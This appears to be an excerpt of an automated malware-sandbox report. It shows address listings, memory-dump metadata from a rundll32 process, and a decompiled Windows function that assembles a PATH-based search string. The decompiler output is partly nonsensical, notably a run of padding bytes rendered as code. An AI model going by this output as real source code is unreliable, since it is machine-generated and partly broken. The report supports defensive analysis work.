                                                                                                                0x04464817
                                                                                                                0x0446481e
                                                                                                                0x04464820
                                                                                                                0x04464822
                                                                                                                0x04464822
                                                                                                                0x04464824
                                                                                                                0x04464824
                                                                                                                0x0446482a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04464835
                                                                                                                0x0446483a
                                                                                                                0x0446483d
                                                                                                                0x0446483f
                                                                                                                0x04464842
                                                                                                                0x04464842
                                                                                                                0x04464842
                                                                                                                0x04464846
                                                                                                                0x0446484c
                                                                                                                0x0446484e
                                                                                                                0x04464851
                                                                                                                0x04464851
                                                                                                                0x04464853
                                                                                                                0x04464854
                                                                                                                0x04464854
                                                                                                                0x04464858
                                                                                                                0x0446485a
                                                                                                                0x0446485a
                                                                                                                0x0446485d
                                                                                                                0x0446485f
                                                                                                                0x04464861
                                                                                                                0x04464861
                                                                                                                0x04464866
                                                                                                                0x0446486b
                                                                                                                0x0446486e
                                                                                                                0x04464871
                                                                                                                0x04464876
                                                                                                                0x04464876
                                                                                                                0x04464878
                                                                                                                0x0446487b
                                                                                                                0x04464884
                                                                                                                0x04464884
                                                                                                                0x00000000
                                                                                                                0x0446487d
                                                                                                                0x0446487d
                                                                                                                0x04464882
                                                                                                                0x04464889
                                                                                                                0x04464889
                                                                                                                0x0446488f
                                                                                                                0x04464891
                                                                                                                0x044648e0
                                                                                                                0x044648e2
                                                                                                                0x044648e4
                                                                                                                0x044648e4
                                                                                                                0x044648e7
                                                                                                                0x044648e7
                                                                                                                0x044648ed
                                                                                                                0x044648f4
                                                                                                                0x044648f6
                                                                                                                0x04464951
                                                                                                                0x04464951
                                                                                                                0x04464953
                                                                                                                0x04464953
                                                                                                                0x04464956
                                                                                                                0x04464956
                                                                                                                0x04464958
                                                                                                                0x04464959
                                                                                                                0x04464959
                                                                                                                0x0446495d
                                                                                                                0x0446495d
                                                                                                                0x0446495f
                                                                                                                0x0446495f
                                                                                                                0x04464965
                                                                                                                0x04464969
                                                                                                                0x044649ba
                                                                                                                0x044649ba
                                                                                                                0x044649c1
                                                                                                                0x044649c5
                                                                                                                0x044649cc
                                                                                                                0x044649d4
                                                                                                                0x044649d7
                                                                                                                0x044649da
                                                                                                                0x044649e4
                                                                                                                0x044649e5
                                                                                                                0x044649f3
                                                                                                                0x04464a02
                                                                                                                0x00000000
                                                                                                                0x04464a02
                                                                                                                0x04464972
                                                                                                                0x04464974
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04464976
                                                                                                                0x04464979
                                                                                                                0x04464982
                                                                                                                0x04464983
                                                                                                                0x04464984
                                                                                                                0x0446498b
                                                                                                                0x0446498d
                                                                                                                0x04464991
                                                                                                                0x04464993
                                                                                                                0x04464999
                                                                                                                0x0446499d
                                                                                                                0x044649a2
                                                                                                                0x044649a2
                                                                                                                0x044649a2
                                                                                                                0x04464999
                                                                                                                0x044649ac
                                                                                                                0x00000000
                                                                                                                0x044649b3
                                                                                                                0x044648f8
                                                                                                                0x044648fe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044648fe
                                                                                                                0x04464895
                                                                                                                0x0446489c
                                                                                                                0x044648ad
                                                                                                                0x044648b2
                                                                                                                0x044648b5
                                                                                                                0x044648b7
                                                                                                                0x044648ba
                                                                                                                0x044648bc
                                                                                                                0x044648c6
                                                                                                                0x044648c6
                                                                                                                0x044648cb
                                                                                                                0x044648d1
                                                                                                                0x044648d4
                                                                                                                0x044648d8
                                                                                                                0x044648d8
                                                                                                                0x00000000
                                                                                                                0x044648d8
                                                                                                                0x044648be
                                                                                                                0x044648c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044648c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044648c4
                                                                                                                0x00000000
                                                                                                                0x04464882
                                                                                                                0x0446487b
                                                                                                                0x04464904
                                                                                                                0x04464906
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04464908
                                                                                                                0x0446490e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04464910
                                                                                                                0x04464917
                                                                                                                0x04464917
                                                                                                                0x00000000
                                                                                                                0x04464917
                                                                                                                0x0440b1ba
                                                                                                                0x044647f9
                                                                                                                0x044647fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044647fc
                                                                                                                0x0440b1c0
                                                                                                                0x0440b1c0
                                                                                                                0x0440b1c3
                                                                                                                0x0440b1cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _vswprintf_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 677850445-0
                                                                                                                • Opcode ID: fca8ea75d416e97955108c495778a3114aa9fa00ef796582ef1965d8a43af04e
                                                                                                                • Instruction ID: 41afa42d8cebacb1200687fa389ba97bcc79ded342c572224eb7af38a2ab02e9
                                                                                                                • Opcode Fuzzy Hash: fca8ea75d416e97955108c495778a3114aa9fa00ef796582ef1965d8a43af04e
                                                                                                                • Instruction Fuzzy Hash: C651D075E006598EEF35CF748844BAEBBB0FF40714F1081AFD85AAB382D77069458B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04432581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E04432581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				void* _t244;
				void* _t246;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				signed int _t289;
				signed int _t291;
				void* _t293;
				void* _t296;
				void* _t297;
				void* _t299;
				signed int _t300;
				unsigned int _t303;
				signed int _t307;
				signed int _t309;
				signed int _t313;
				intOrPtr _t325;
				signed int _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t344;
				signed int _t345;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t353;
				void* _t354;
				void* _t356;

				_t350 = _t353;
				_t354 = _t353 - 0x4c;
				_v8 =  *0x44fd360 ^ _t350;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t344 = 0x44fb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t303 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t356 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t289 = 0x48;
				_t323 = 0 | _t356 == 0x00000000;
				_t334 = 0;
				_v37 = _t356 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t345 = 0xc0000106;
						goto L32;
					} else {
						_t344 = L04424620(_t303,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t344;
						__eflags = _t344;
						if(_t344 == 0) {
							_t345 = 0xc0000017;
							goto L32;
						} else {
							 *(_t344 + 0x44) =  *(_t344 + 0x44) & 0x00000000;
							_t50 = _t344 + 0x48; // 0x48
							_t336 = _t50;
							_t323 = _v32;
							 *(_t344 + 0x3c) = _t289;
							_t291 = 0;
							 *((short*)(_t344 + 0x30)) = _v48;
							__eflags = _t323;
							if(_t323 != 0) {
								 *(_t344 + 0x18) = _t336;
								__eflags = _t323 - 0x44f8478;
								 *_t344 = ((0 | _t323 == 0x044f8478) - 0x00000001 & 0xfffffffb) + 7;
								E0444F3E0(_t336,  *((intOrPtr*)(_t323 + 4)),  *_t323 & 0x0000ffff);
								_t323 = _v32;
								_t354 = _t354 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t336 = _t336 + (( *_t323 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E044939F2(_t336);
									_t323 = _v32;
									_t336 = _t283;
								}
							}
							_t307 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t345 = _v68;
								__eflags = 0;
								 *((short*)(_t336 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t344 + _t291 * 4;
								_v56 = _t289;
								do {
									__eflags = _t323;
									if(_t323 != 0) {
										_t239 =  *(_v60 + _t307 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t307 * 4);
										 *(_t289 + 0x18) = _t336;
										_t243 =  *(_v60 + _t307 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M04432959))) {
												case 0:
													__ax =  *0x44f8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0444F3E0(__edi,  *0x44f848c, __ax & 0x0000ffff);
														__eax =  *0x44f8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0444F3E0(_t336, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0x44f8480 & 0x0000ffff = E0444F3E0(__edi,  *0x44f8484,  *0x44f8480 & 0x0000ffff);
													__eax =  *0x44f8480 & 0x0000ffff;
													__eax = ( *0x44f8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0444F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0444F3E0(_t336, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t354 = _t354 + 0xc;
													_t336 = _t336 + (_t278 >> 1) * 2 + 2;
													__eflags = _t336;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t336 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx =  *0x44f575c;
													__eflags = __ebx - 0x44f575c;
													if(__ebx != 0x44f575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0444F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x44f575c;
														} while (__ebx != 0x44f575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x44f8478 & 0x0000ffff = E0444F3E0(__edi,  *0x44f847c,  *0x44f8478 & 0x0000ffff);
													__eax =  *0x44f8478 & 0x0000ffff;
													__eax = ( *0x44f8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E044939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x44f6e58 & 0x0000ffff = E0444F3E0(__edi,  *0x44f6e5c,  *0x44f6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x44f6e58 & 0x0000ffff;
													__eax = ( *0x44f6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t307 = _v16;
													_t323 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t307 = _t307 + 1;
									_v16 = _t307;
									__eflags = _t307 - _v48;
								} while (_t307 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t334 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M04432935))) {
							case 0:
								__ax =  *0x44f8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t323 =  &_v64;
								_v80 = E04432E3E(0,  &_v64);
								_t289 = _t289 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x44f8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x44f8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0441EEF0(0x44f79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0441EB70(__ecx, 0x44f79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t345;
												if(_t345 < 0) {
													L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t303 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x44f7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0441EB70(__ecx, 0x44f79a0);
										__eax = _v52;
										L36:
										_pop(_t335);
										_pop(_t346);
										__eflags = _v8 ^ _t350;
										_pop(_t290);
										return E0444B640(_t218, _t290, _v8 ^ _t350, _t323, _t335, _t346);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t285 = _v56;
								if(_v56 != 0) {
									_t323 =  &_v36;
									_t287 = E04432E3E(_t285,  &_v36);
									_t303 = _v36;
									_v76 = _t287;
								}
								if(_t303 == 0) {
									goto L44;
								} else {
									_t289 = _t289 + 2 + _t303;
								}
								goto L14;
							case 6:
								__eax =  *0x44f5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x44f8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x44f8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x44f6e58 & 0x0000ffff;
								__eax = ( *0x44f6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t334 = _t334 + 1;
								if(_t334 >= _v48) {
									goto L16;
								} else {
									_t323 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t293 = _t289 + 1;
					_t244 = _t243 + 0x66;
					 *((intOrPtr*)(_t293 + 4)) =  *((intOrPtr*)(_t293 + 4)) - _t244;
					asm("loopne 0x29");
					_t246 = _t244 + 0x74;
					 *((intOrPtr*)(_t293 + 6)) =  *((intOrPtr*)(_t293 + 6)) - _t246;
					_t296 = 0x25;
					_t248 = _t246 + 0x1f0443ba;
					 *((intOrPtr*)(_t296 + 4)) =  *((intOrPtr*)(_t296 + 4)) - _t248;
					_t249 = _t248 ^ 0x0204475b;
					 *((intOrPtr*)(_t296 + 4)) =  *((intOrPtr*)(_t296 + 4)) - _t249;
					 *_t249 =  *_t249 - 0x43;
					asm("daa");
					_t297 = _t296 + 1;
					_t251 = _t249 + 0x114;
					 *((intOrPtr*)(_t297 + 4)) =  *((intOrPtr*)(_t297 + 4)) - _t251;
					_t347 = _t344 - 1;
					 *((intOrPtr*)(_t297 + 4)) =  *((intOrPtr*)(_t297 + 4)) - _t251;
					asm("daa");
					_pop(_t299);
					 *((intOrPtr*)(_t299 + 4)) =  *((intOrPtr*)(_t299 + 4)) - _t251 + 0x18c;
					_t339 = _t336 + 3;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x44dff00);
					E0445D08C(_t299, _t339, _t347);
					_v44 =  *[fs:0x18];
					_t340 = 0;
					 *_a24 = 0;
					_t300 = _a12;
					__eflags = _t300;
					if(_t300 == 0) {
						_t258 = 0xc0000100;
					} else {
						_v8 = 0;
						_t348 = 0xc0000100;
						_v52 = 0xc0000100;
						_t260 = 4;
						while(1) {
							_v40 = _t260;
							__eflags = _t260;
							if(_t260 == 0) {
								break;
							}
							_t313 = _t260 * 0xc;
							_v48 = _t313;
							__eflags = _t300 -  *((intOrPtr*)(_t313 + 0x43e1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t275 = E0444E5C0(_a8,  *((intOrPtr*)(_t313 + 0x43e1668)), _t300);
									_t354 = _t354 + 0xc;
									__eflags = _t275;
									if(__eflags == 0) {
										_t348 = E044851BE(_t300,  *((intOrPtr*)(_v48 + 0x43e166c)), _a16, _t340, _t348, __eflags, _a20, _a24);
										_v52 = _t348;
										break;
									} else {
										_t260 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t260 = _t260 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t348;
						__eflags = _t348;
						if(_t348 < 0) {
							__eflags = _t348 - 0xc0000100;
							if(_t348 == 0xc0000100) {
								_t309 = _a4;
								__eflags = _t309;
								if(_t309 != 0) {
									_v36 = _t309;
									__eflags =  *_t309 - _t340;
									if( *_t309 == _t340) {
										_t348 = 0xc0000100;
										goto L76;
									} else {
										_t325 =  *((intOrPtr*)(_v44 + 0x30));
										_t262 =  *((intOrPtr*)(_t325 + 0x10));
										__eflags =  *((intOrPtr*)(_t262 + 0x48)) - _t309;
										if( *((intOrPtr*)(_t262 + 0x48)) == _t309) {
											__eflags =  *(_t325 + 0x1c);
											if( *(_t325 + 0x1c) == 0) {
												L106:
												_t348 = E04432AE4( &_v36, _a8, _t300, _a16, _a20, _a24);
												_v32 = _t348;
												__eflags = _t348 - 0xc0000100;
												if(_t348 != 0xc0000100) {
													goto L69;
												} else {
													_t340 = 1;
													_t309 = _v36;
													goto L75;
												}
											} else {
												_t265 = E04416600( *(_t325 + 0x1c));
												__eflags = _t265;
												if(_t265 != 0) {
													goto L106;
												} else {
													_t309 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t348 = E04432C50(_t309, _a8, _t300, _a16, _a20, _a24, _t340);
											L76:
											_v32 = _t348;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t348 = _a24;
									_t272 = E04432AE4( &_v36, _a8, _t300, _a16, _a20, _t348);
									_v32 = _t272;
									__eflags = _t272 - 0xc0000100;
									if(_t272 == 0xc0000100) {
										_v32 = E04432C50(_v36, _a8, _t300, _a16, _a20, _t348, 1);
									}
									_v8 = _t340;
									E04432ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t258 = _t348;
					}
					L70:
					return E0445D0D1(_t258);
				}
				L108:
			}



























































                                                                                                                0x04432584
                                                                                                                0x04432586
                                                                                                                0x04432590
                                                                                                                0x04432596
                                                                                                                0x04432597
                                                                                                                0x04432598
                                                                                                                0x04432599
                                                                                                                0x0443259e
                                                                                                                0x044325a4
                                                                                                                0x044325a9
                                                                                                                0x044325ac
                                                                                                                0x044325ae
                                                                                                                0x044325b1
                                                                                                                0x044325b2
                                                                                                                0x044325b5
                                                                                                                0x044325b8
                                                                                                                0x044325bb
                                                                                                                0x044325bc
                                                                                                                0x044325bf
                                                                                                                0x044325c2
                                                                                                                0x044325c5
                                                                                                                0x044325c6
                                                                                                                0x044325cb
                                                                                                                0x044325ce
                                                                                                                0x044325d8
                                                                                                                0x044325db
                                                                                                                0x044325dd
                                                                                                                0x044325de
                                                                                                                0x044325e1
                                                                                                                0x044325e3
                                                                                                                0x044325e9
                                                                                                                0x044326da
                                                                                                                0x044326da
                                                                                                                0x044326dd
                                                                                                                0x044326e2
                                                                                                                0x04475b56
                                                                                                                0x00000000
                                                                                                                0x044326e8
                                                                                                                0x044326f9
                                                                                                                0x044326fb
                                                                                                                0x044326fe
                                                                                                                0x04432700
                                                                                                                0x04475b60
                                                                                                                0x00000000
                                                                                                                0x04432706
                                                                                                                0x04432706
                                                                                                                0x0443270a
                                                                                                                0x0443270a
                                                                                                                0x0443270d
                                                                                                                0x04432713
                                                                                                                0x04432716
                                                                                                                0x04432718
                                                                                                                0x0443271c
                                                                                                                0x0443271e
                                                                                                                0x04475b6c
                                                                                                                0x04475b6f
                                                                                                                0x04475b7f
                                                                                                                0x04475b89
                                                                                                                0x04475b8e
                                                                                                                0x04475b93
                                                                                                                0x04475b96
                                                                                                                0x04475b9c
                                                                                                                0x04475ba0
                                                                                                                0x04475ba3
                                                                                                                0x04475bab
                                                                                                                0x04475bb0
                                                                                                                0x04475bb3
                                                                                                                0x04475bb3
                                                                                                                0x04475ba3
                                                                                                                0x04432724
                                                                                                                0x04432726
                                                                                                                0x04432729
                                                                                                                0x0443272c
                                                                                                                0x0443279d
                                                                                                                0x0443279d
                                                                                                                0x044327a0
                                                                                                                0x044327a2
                                                                                                                0x00000000
                                                                                                                0x0443272e
                                                                                                                0x0443272e
                                                                                                                0x04432731
                                                                                                                0x04432734
                                                                                                                0x04432734
                                                                                                                0x04432736
                                                                                                                0x04475bc1
                                                                                                                0x04475bc1
                                                                                                                0x04475bc4
                                                                                                                0x00000000
                                                                                                                0x04475bca
                                                                                                                0x04475bca
                                                                                                                0x04475bcd
                                                                                                                0x00000000
                                                                                                                0x04475bd3
                                                                                                                0x00000000
                                                                                                                0x04475bd3
                                                                                                                0x04475bcd
                                                                                                                0x0443273c
                                                                                                                0x0443273c
                                                                                                                0x04432742
                                                                                                                0x04432747
                                                                                                                0x0443274a
                                                                                                                0x0443274d
                                                                                                                0x04432750
                                                                                                                0x00000000
                                                                                                                0x04432756
                                                                                                                0x04432756
                                                                                                                0x00000000
                                                                                                                0x04432902
                                                                                                                0x04432908
                                                                                                                0x0443290b
                                                                                                                0x00000000
                                                                                                                0x04432911
                                                                                                                0x0443291c
                                                                                                                0x04432921
                                                                                                                0x00000000
                                                                                                                0x04432921
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432880
                                                                                                                0x04432887
                                                                                                                0x0443288c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432805
                                                                                                                0x0443280a
                                                                                                                0x04432814
                                                                                                                0x04432816
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443281e
                                                                                                                0x04432821
                                                                                                                0x04432823
                                                                                                                0x00000000
                                                                                                                0x04432829
                                                                                                                0x04432829
                                                                                                                0x04432831
                                                                                                                0x0443283c
                                                                                                                0x0443283e
                                                                                                                0x00000000
                                                                                                                0x0443283e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443284e
                                                                                                                0x04432850
                                                                                                                0x04432851
                                                                                                                0x04432854
                                                                                                                0x04432857
                                                                                                                0x0443285a
                                                                                                                0x0443285c
                                                                                                                0x0443285d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0443275d
                                                                                                                0x04432761
                                                                                                                0x00000000
                                                                                                                0x04432767
                                                                                                                0x0443276e
                                                                                                                0x04432773
                                                                                                                0x04432773
                                                                                                                0x04432776
                                                                                                                0x04432778
                                                                                                                0x0443277e
                                                                                                                0x0443277e
                                                                                                                0x04432781
                                                                                                                0x04432781
                                                                                                                0x04432783
                                                                                                                0x04432784
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475bd8
                                                                                                                0x04475bde
                                                                                                                0x04475be4
                                                                                                                0x04475be6
                                                                                                                0x04475be8
                                                                                                                0x04475be9
                                                                                                                0x04475bee
                                                                                                                0x04475bf8
                                                                                                                0x04475bff
                                                                                                                0x04475c01
                                                                                                                0x04475c04
                                                                                                                0x04475c07
                                                                                                                0x04475c0b
                                                                                                                0x04475c0d
                                                                                                                0x04475c0d
                                                                                                                0x04475c15
                                                                                                                0x04475c18
                                                                                                                0x04475c1b
                                                                                                                0x04475c1b
                                                                                                                0x04475c1e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044328c3
                                                                                                                0x044328c8
                                                                                                                0x044328d2
                                                                                                                0x044328d4
                                                                                                                0x044328d8
                                                                                                                0x044328db
                                                                                                                0x04475c26
                                                                                                                0x04475c28
                                                                                                                0x04475c2d
                                                                                                                0x04475c2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04475c34
                                                                                                                0x04475c36
                                                                                                                0x04475c49
                                                                                                                0x04475c4e
                                                                                                                0x04475c54
                                                                                                                0x04475c5b
                                                                                                                0x04475c5d
                                                                                                                0x04475c60
                                                                                                                0x04432788
                                                                                                                0x04432788
                                                                                                                0x0443278b
                                                                                                                0x0443278e
                                                                                                                0x0443278e
                                                                                                                0x0443278e
                                                                                                                0x04432791
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432756
                                                                                                                0x04432750
                                                                                                                0x00000000
                                                                                                                0x04432794
                                                                                                                0x04432794
                                                                                                                0x04432795
                                                                                                                0x04432798
                                                                                                                0x04432798
                                                                                                                0x00000000
                                                                                                                0x04432734
                                                                                                                0x0443272c
                                                                                                                0x04432700
                                                                                                                0x044325ef
                                                                                                                0x044325ef
                                                                                                                0x044325ef
                                                                                                                0x044325f2
                                                                                                                0x044325f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044325fe
                                                                                                                0x00000000
                                                                                                                0x044328e6
                                                                                                                0x044328ec
                                                                                                                0x044328ef
                                                                                                                0x044328f5
                                                                                                                0x044328f8
                                                                                                                0x044328f8
                                                                                                                0x00000000
                                                                                                                0x044328f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432866
                                                                                                                0x04432866
                                                                                                                0x04432876
                                                                                                                0x04432879
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044327e0
                                                                                                                0x044327e7
                                                                                                                0x044327e9
                                                                                                                0x044327eb
                                                                                                                0x04475afd
                                                                                                                0x00000000
                                                                                                                0x04475afd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04432633
                                                                                                                0x04432638
                                                                                                                0x0443263b
                                                                                                                0x0443263c
                                                                                                                0x0443263e
                                                                                                                0x04432640
                                                                                                                0x04432642
                                                                                                                0x04432647
                                                                                                                0x04432649
                                                                                                                0x0443264e
                                                                                                                0x04432650
                                                                                                                0x04432653
                                                                                                                0x04432659
                                                                                                                0x044326a2
                                                                                                                0x044326a7
                                                                                                                0x044326ac
                                                                                                                0x044326b2
                                                                                                                0x04475b11
